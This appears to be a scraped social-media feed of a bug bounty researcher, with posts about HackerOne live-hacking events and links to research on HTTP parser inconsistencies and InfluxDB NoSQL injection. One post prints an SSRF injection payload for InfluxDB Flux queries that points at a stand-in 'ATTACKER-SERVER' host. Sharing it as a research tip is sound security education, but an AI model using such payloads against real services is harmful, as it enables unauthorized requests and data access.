Security Researcher rafa.hashnode.dev/

Joined August 2023
1 Photos and videos
Pinned Tweet
17 Aug 2023
check out my latest research (Exploiting HTTP Parsers Inconsistencies): rafa.hashnode.dev/exploiting…

3
35
111
9,675
rafa retweeted
We’re excited to announce the top 3 winners from H1-361 Bali 🌴🏆 Huge congrats to these incredible security researchers for an unforgettable live hacking event: 🥇 1st Place — @nahuelrm_ 🥈 2nd Place — @zere 🥉 3rd Place — @joaxcar Thanks to everyone who joined us in Bali and helped make this event a great week of collaboration and community. #TogetherWeHitHarder
6
13
152
15,724
10 Nov 2025
Had an awesome time hacking alongsite @busf4ctor and @monkehack at the H1-3120 Live Hacking Event in Amsterdam by @Hacker0x01, partnered with Salesforce!
19
1,694
rafa retweeted
10 Nov 2025
Amsterdam brought the 🔥! @salesforce #H13120 = one incredible Live Hacking Event 🇳🇱 Security researchers tackled AI challenges head-on—finding vulnerabilities, sharing insights, and shaping the future of secure innovation. #HackForGood #AISecurity #TogetherWeHitHarder
8
8
117
12,567
If you ever need help with a bug, you can always count on our community! 🫂
4
31
2,738
28 Sep 2025
I’m very pleased to share that I was invited by @Hacker0x01 to participate in the Live Hacking Event H1-468 in Sweden, with all expenses covered under the Platform Performer recognition!
8
2
129
6,899
rafa retweeted
Unbelievable exploitation journey documented in a thread in the # critical-thinkers on the CTBB discord. Shout out to @rafabyte_ for finding the solution, and @TomAnthonySEO for doing WORK. Assists: @joaxcar, Balint, @J0R1AN, @kevin_mizu @7urb01, and yours truly, among others.
2
9
113
10,055
27 Oct 2023
My research (Exploiting HTTP Parsers Inconsistencies) now has a dedicated page on HackTricks! book.hacktricks.xyz/pentesti…

2
8
590
29 Aug 2023
Did you know that this is a valid payload for SSRF? ") |> yield(name: "1337") from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0) // yield(name: "1337") from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0) //">example.com/?id=") |%3… Check out my post where I explain that: rafa.hashnode.dev/influxdb-n… #bugbountytips

4
541
rafa retweeted
22 Aug 2023
#100DaysOfHacking Day 16: - Still bug hunting :D (Currently trying to bypass WAF for XSS) - Found a cool research about exploiting HTTP Parsers Inconsistencies rafa.hashnode.dev/exploiting…

1
4
1,277
rafa retweeted
Exploiting HTTP Parsers Inconsistencies by Rafael da Costa Santos rafa.hashnode.dev/exploiting… #BBRENewsletter59 Subscribe to get the next issue: bbre.dev/nl
1
24
95
10,145
17 Aug 2023
Just published a post detailing how I developed an exploit for a NoSQL Injection for InfluxDB and how I escalated this issue into an SSRF and XSS: rafa.hashnode.dev/influxdb-n…

2
257
rafa retweeted
Check out the latest issue of BBRE Newsletter🔥 bbre.dev/59
1
5
16
4,266